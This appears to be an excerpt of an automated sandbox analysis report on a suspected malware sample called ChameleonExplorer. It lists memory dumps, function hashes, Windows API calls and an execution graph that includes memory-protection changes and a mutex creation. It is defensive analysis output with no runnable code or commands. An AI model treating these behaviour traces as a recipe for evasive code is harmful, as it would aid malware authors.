                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise
                                                                                                            • String ID: H
                                                                                                            • API String ID: 3997070919-2852464175
                                                                                                            • Opcode ID: 30ae31d53f67b1b97da05918407c6e1b817595724ff1720de508a7648639e5ba
                                                                                                            • Instruction ID: 9b3a1fcb387a5fa124f88de2ff8895541f8bba7e998e7e286aa0cbbb29098add
                                                                                                            • Opcode Fuzzy Hash: 30ae31d53f67b1b97da05918407c6e1b817595724ff1720de508a7648639e5ba
                                                                                                            • Instruction Fuzzy Hash: 80D10436A08B8486D771EB15F4943ABB7A4F78A784F448529DACD47BA8DF7CC184CB40
                                                                                                            APIs
                                                                                                              • Part of subcall function 03329910: GetCurrentThreadId.KERNEL32 ref: 03329918
                                                                                                            • GetTickCount.KERNEL32 ref: 03329316
                                                                                                            • GetTickCount.KERNEL32 ref: 0332932F
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03329369
                                                                                                            • GetTickCount.KERNEL32 ref: 0332939C
                                                                                                            • GetTickCount.KERNEL32 ref: 033293DA
                                                                                                            • GetTickCount.KERNEL32 ref: 03329409
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332947F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 3968769311-0
                                                                                                            • Opcode ID: a8d4bbb3f989b62a580673071860fff90fd498d76811550264ad4728d208a904
                                                                                                            • Instruction ID: 00f3a3bb93436069d61b179bac1f0ade107551c2f1cb14fb9caa5bb9ef483c9b
                                                                                                            • Opcode Fuzzy Hash: a8d4bbb3f989b62a580673071860fff90fd498d76811550264ad4728d208a904
                                                                                                            • Instruction Fuzzy Hash: 0F41C4367016218EDB25CE3AD9D076E2F94FB48BACF195229DE0D8BB54DB31C4D18780
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite
                                                                                                            • String ID: Error$Runtime error at 0000000000000000
                                                                                                            • API String ID: 3320372497-326393251
                                                                                                            • Opcode ID: fce14d3aa193777544efd357b1419e206242d4d6fc658ce1d4404a245c2956f7
                                                                                                            • Instruction ID: f31bcb94cc2a64904ae9efdcc05f7df845da32516462e090e895050577c13172
                                                                                                            • Opcode Fuzzy Hash: fce14d3aa193777544efd357b1419e206242d4d6fc658ce1d4404a245c2956f7
                                                                                                            • Instruction Fuzzy Hash: 9911F970A00B50D1FB22D772F894BD67B68BB88750F84420AAA590E3E4DFBCC384C741
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 351091851-0
                                                                                                            • Opcode ID: f1e92f4fc96b21d4afc7bfdf1581951038034155663d0e200a3a16e926de1310
                                                                                                            • Instruction ID: b6810eb5641cc00a2b8aa281addb0f3ebf1ac1ba59fe48adf9353e55fc94d89f
                                                                                                            • Opcode Fuzzy Hash: f1e92f4fc96b21d4afc7bfdf1581951038034155663d0e200a3a16e926de1310
                                                                                                            • Instruction Fuzzy Hash: E5416D36A007508ACF24EF75D8D0AEE7366F744BC8B089511FE5A9BB18EB39D442C380
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3320372497-0
                                                                                                            • Opcode ID: ac90d7c63a92a973ba46d1f235bae17841751114b33d6989592fd13c078a7ee8
                                                                                                            • Instruction ID: 59267b624cc52ccb615b1720b8d7347e524428b9a1d65c1ddd7ee84cb31a80ad
                                                                                                            • Opcode Fuzzy Hash: ac90d7c63a92a973ba46d1f235bae17841751114b33d6989592fd13c078a7ee8
                                                                                                            • Instruction Fuzzy Hash: 4E11C276710A7484E615EFB3BC9079A6E54BB45FD4F044226AE5E0FBD4CE38C1418790
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProclstrlen
                                                                                                            • String ID: GetLongPathNameW$kernel32.dll
                                                                                                            • API String ID: 3607816002-568771998
                                                                                                            • Opcode ID: 90f9d78a22d5f1cad26b0ec37224b2317c8a06b8499cbf7c8c26fb722b0e8ad8
                                                                                                            • Instruction ID: 5a6171a180f3d1c99c76817fcbc5b10990ef33b54664eea2e2dedd2c92bc6cbb
                                                                                                            • Opcode Fuzzy Hash: 90f9d78a22d5f1cad26b0ec37224b2317c8a06b8499cbf7c8c26fb722b0e8ad8
                                                                                                            • Instruction Fuzzy Hash: CF517136700B6194CB24DF26D8D42E96B71FB48BECF4992269E0D5BB68EF78C585C340
                                                                                                            APIs
                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 0332F921
                                                                                                            • EnterCriticalSection.KERNEL32 ref: 0332F9F7
                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 0332FA30
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Leave$Enter
                                                                                                            • String ID: en-GB,en,en-US,
                                                                                                            • API String ID: 2978645861-3021119265
                                                                                                            • Opcode ID: 3cc591147d5eca7391baeacbe979723ce54a6e938ee10206e13814fad2db1b66
                                                                                                            • Instruction ID: daa049e8156e4fb0098f3d09d34476546e2e8812720a01bb509e1dd4feac28b6
                                                                                                            • Opcode Fuzzy Hash: 3cc591147d5eca7391baeacbe979723ce54a6e938ee10206e13814fad2db1b66
                                                                                                            • Instruction Fuzzy Hash: 5E415175610B2098DB10EF75D8D03E92B36EB95B9CF942112FA5E4BA68DF74C581C390
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32 ref: 0332F769
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 0332F7E0
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 0332F84F
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 0332F88F
                                                                                                              • Part of subcall function 0332F6F0: GetThreadPreferredUILanguages.KERNEL32 ref: 0332F716
                                                                                                              • Part of subcall function 0332F6F0: GetThreadPreferredUILanguages.KERNEL32 ref: 0332F73F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 993b11deb205f4daf21b330f373d00d8343a75854a04e47f9f46afe1bf24d38e
                                                                                                            • Instruction ID: d0d1bcf6e746ffd60204e65d2d0a187f5546356c64bccd8e4182cb5d18368c3f
                                                                                                            • Opcode Fuzzy Hash: 993b11deb205f4daf21b330f373d00d8343a75854a04e47f9f46afe1bf24d38e
                                                                                                            • Instruction Fuzzy Hash: 5831A2766016708ADB54DF35CA943EA7B62EB44BD9F486026FE0B4BB58DB74C8C9C340

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:12.4%
                                                                                                            Dynamic/Decrypted Code Coverage:22.8%
                                                                                                            Signature Coverage:10.2%
                                                                                                            Total number of Nodes:2000
                                                                                                            Total number of Limit Nodes:13
                                                                                                            execution_graph 18101 417236 18102 417245 20 API calls 18101->18102 18103 417349 18101->18103 18102->18103 18104 600dc8 18105 600dec VirtualProtectEx 18104->18105 18107 600e2e VirtualProtectEx 18105->18107 18110 600fb7 GetPEB 18107->18110 18109 600e5d 18123 601162 NtProtectVirtualMemory 18110->18123 18112 6010a4 18112->18109 18113 600fec 18113->18112 18114 6010a7 18113->18114 18119 601015 18113->18119 18117 601110 18114->18117 18118 6010c9 18114->18118 18116 60115f 18116->18109 18126 601162 NtProtectVirtualMemory 18117->18126 18125 601162 NtProtectVirtualMemory 18118->18125 18119->18119 18124 601162 NtProtectVirtualMemory 18119->18124 18122 60110d 18122->18109 18123->18113 18124->18112 18125->18122 18126->18116 18127 41a218 18134 404d5c GetModuleHandleA 18127->18134 18129 41a228 18136 4186e4 18129->18136 18135 404d8f 18134->18135 18135->18129 18137 4186ec 18136->18137 18410 4034e4 18137->18410 18143 418731 18419 407de0 18143->18419 18149 41875a 18150 418765 CreateMutexA 18149->18150 18151 41877f 18150->18151 18152 41967c 18151->18152 18153 40357c 13 API calls 18151->18153 18154 4034e4 13 API calls 18152->18154 18155 418797 18153->18155 18156 419694 18154->18156 18489 416df4 18155->18489 19236 403bf4 18156->19236 18162 4034e4 13 API calls 18164 4196af 18162->18164 18166 403bf4 SysFreeString 18164->18166 18165 40357c 13 API calls 18167 4187c5 18165->18167 18168 4196bf 18166->18168 18170 406ce8 43 API calls 18167->18170 19240 403508 18168->19240 18172 4187d0 18170->18172 18506 406834 18172->18506 18177 403508 13 API calls 18179 4196ea 18177->18179 18182 403bdc SysFreeString 18179->18182 18180 4187f4 18181 416df4 27 API calls 18180->18181 18183 418804 18181->18183 18184 4196f5 18182->18184 18541 417da4 18183->18541 18186 403508 13 API calls 18184->18186 18188 419705 18186->18188 18190 403bdc SysFreeString 18188->18190 18189 416df4 27 API calls 18198 418825 18189->18198 18191 419710 18190->18191 18192 403508 13 API calls 18191->18192 18193 419720 18192->18193 18194 403bdc SysFreeString 18193->18194 18195 41972b 18194->18195 18196 403508 13 API calls 18195->18196 18197 41973b 18196->18197 18199 403bdc SysFreeString 18197->18199 18198->18152 18616 4074e8 18198->18616 18201 419746 18199->18201 18203 403508 13 API calls 18201->18203 18205 419756 18203->18205 18204 4069a8 27 API calls 18206 418872 18204->18206 18208 403bdc SysFreeString 18205->18208 18207 4074e8 27 API calls 18206->18207 18209 41888b 18207->18209 18210 419761 18208->18210 18626 406b08 18209->18626 18212 403508 13 API calls 18210->18212 18214 419771 18212->18214 18216 403bdc SysFreeString 18214->18216 18218 41977c 18216->18218 18220 403508 13 API calls 18218->18220 18219 4074e8 27 API calls 18221 4188c2 18219->18221 18222 41978c 18220->18222 18223 4069a8 27 API calls 18221->18223 18224 403bdc SysFreeString 18222->18224 18225 4188d3 18223->18225 18226 419797 18224->18226 18648 408180 18225->18648 18227 403508 13 API calls 18226->18227 18229 4197a7 18227->18229 18231 403bf4 SysFreeString 18229->18231 18233 4197b7 18231->18233 18234 4034e4 13 API calls 18233->18234 18235 4197c2 18234->18235 18236 403bf4 SysFreeString 18235->18236 18237 4197d2 18236->18237 18239 4034e4 13 API calls 18237->18239 18238 418fd5 18823 4169ac 18238->18823 18240 4197dd 18239->18240 18242 403bf4 SysFreeString 18240->18242 18244 4197ed 18242->18244 18246 4034e4 13 API calls 18244->18246 18249 4197f8 18246->18249 18251 403bf4 SysFreeString 18249->18251 18255 419808 18251->18255 18253 407a18 32 API calls 18287 4188e6 18253->18287 18257 4034e4 13 API calls 18255->18257 18260 419813 18257->18260 18259 403850 27 API calls 18259->18287 18266 403bf4 SysFreeString 18260->18266 18262 40357c 13 API calls 18262->18287 18270 419823 18266->18270 18273 403508 13 API calls 18270->18273 18272 40e6d4 28 API calls 18272->18287 18276 419833 18273->18276 18280 4034e4 13 API calls 18276->18280 18279 418b1d GetSystemMetrics GetSystemMetrics 19176 416fd0 18279->19176 18285 41983b 18280->18285 18283 417da4 65 API calls 18283->18287 18284 41899b 18284->18287 18290 413f58 53 API calls 18284->18290 18292 407108 15 API calls 18284->18292 18316 413f58 53 API calls 18284->18316 18319 40717c 8 API calls 18284->18319 18323 4034e4 13 API calls 18284->18323 18325 403850 27 API calls 18284->18325 18354 4037dc 27 API calls 18284->18354 18359 413f58 53 API calls 18284->18359 18951 414de8 18284->18951 19032 405114 18284->19032 19060 413f58 18284->19060 19195 403cf4 18284->19195 19211 403db4 18284->19211 19217 4078d8 18284->19217 19247 404280 18285->19247 18287->18152 18287->18238 18287->18253 18287->18259 18287->18262 18287->18272 18287->18279 18287->18283 18287->18284 18291 4074e8 27 API calls 18287->18291 18913 40e1dc 18287->18913 18934 405424 18287->18934 18938 413bb4 18287->18938 18943 405574 18287->18943 18948 413be8 18287->18948 19040 414808 18287->19040 19144 414a90 18287->19144 19189 40709c 18287->19189 18289 41984e 18293 403508 13 API calls 18289->18293 18290->18284 18291->18287 18292->18284 18295 41985b 18293->18295 18297 4034e4 13 API calls 18295->18297 18300 419863 18297->18300 18302 403508 13 API calls 18300->18302 18304 419870 18302->18304 18305 403508 13 API calls 18304->18305 18306 41987d 18305->18306 18398 4033f4 18306->18398 18316->18287 18319->18284 18323->18284 18325->18284 18354->18284 18359->18287 18399 40340d 18398->18399 18400 40342c 18399->18400 18401 40343d 18399->18401 22293 403368 18400->22293 22289 4031dc 18401->22289 18404 403436 18404->18401 18405 403452 18406 403478 FreeLibrary 18405->18406 18408 40347e 18405->18408 18406->18408 18407 4034b3 18408->18407 18409 4034ab ExitProcess 18408->18409 18411 4034ea 18410->18411 18413 403505 18410->18413 18411->18413 19272 402550 18411->19272 18414 40357c 18413->18414 18415 